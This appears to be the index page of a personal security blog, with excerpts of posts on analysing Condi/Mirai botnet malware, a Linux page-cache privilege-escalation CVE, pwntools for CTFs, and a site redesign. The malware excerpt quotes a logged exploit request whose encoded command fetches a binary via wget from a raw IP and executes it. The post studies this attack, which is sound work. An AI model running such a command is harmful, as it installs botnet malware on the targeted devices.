Reverse Engineering Botnet Malware: Condi/Mirai

Intro

I run a website[1] and periodically I’ll go check my web logs for any fun or interesting entries. Most of the time it’s someone wasting EC2 credits running FFuF against the entire internet, but every once in a while there’ll be someone trying to exploit a known vulnerability to download some of their malware. These requests typically look like:

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20sora.arm7%3B%20wget%20http%3A%2F%2F176.65.139.64%2Fbins%2Fsora.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fsora.arm7%20tbk HTTP/1.1 301 1031 "-" "Mozila/5.0"

The core command is pretty standard. ...

05/24/2026 · Me

Replicating & Analyzing CopyFail: CVE-2026-31431

Prelude

CopyFail, also known as CVE-2026-31431, is a controlled 4-byte overwrite to the Linux page cache, effectively granting an unlimited write-anywhere-on-the-filesystem primitive that can easily be used for privilege escalation, among other things. The original disclosure was by Xint and can be found here. If you would like a more formal explanation of how this technique works, I would recommend reading the original article. This post serves as a walkthrough of how the PoC code works, since I believe the code released by Xint was unnecessarily optimized and hard to immediately understand. This can probably be attributed to the claim that the payload is only “732 bytes” small, something they mention no less than five times, despite the fact that the payload could be much smaller (see below). ...

05/08/2026 · Me

Python for Pwn: A brief guide to pwntools

Note that this is far from a comprehensive guide and merely serves as the greatest-common-denominator use case when I’m solving pwn challenges. As such, there is much that pwntools has to offer that I will not cover, either for brevity or because I am not aware of it. That being said, I’ve broken this post down into four sections, the zeroth of which is a “preamble” that I use in all my scripts to set all the variables and initialize everything needed for the coming script. Sections one through three have some overlap but serve as slightly different setups for buffer overflow, format string, and shellcode vulnerabilities. ...

12/21/2025 · Me

Redesigning My Website

In 2020 I decided to make a website. It was COVID times and I, like so many others, decided to use my spare time to sit down and work on a skill that I’d put off for the past few years. My entire experience (and scope for the project) was exclusively with raw HTML, CSS, and JavaScript. No frameworks, server-side processing, or even jQuery. Just bare-bones web development of the early 2000s. Safe to say, it was not the most appealing website, but it got the job done and I could officially say that I had my own website for the first time in my life. I lived with it and liked it for several years, until I finally realized that I should probably put something together that was more fitting of the modern age of web design. ...

12/18/2025 · Me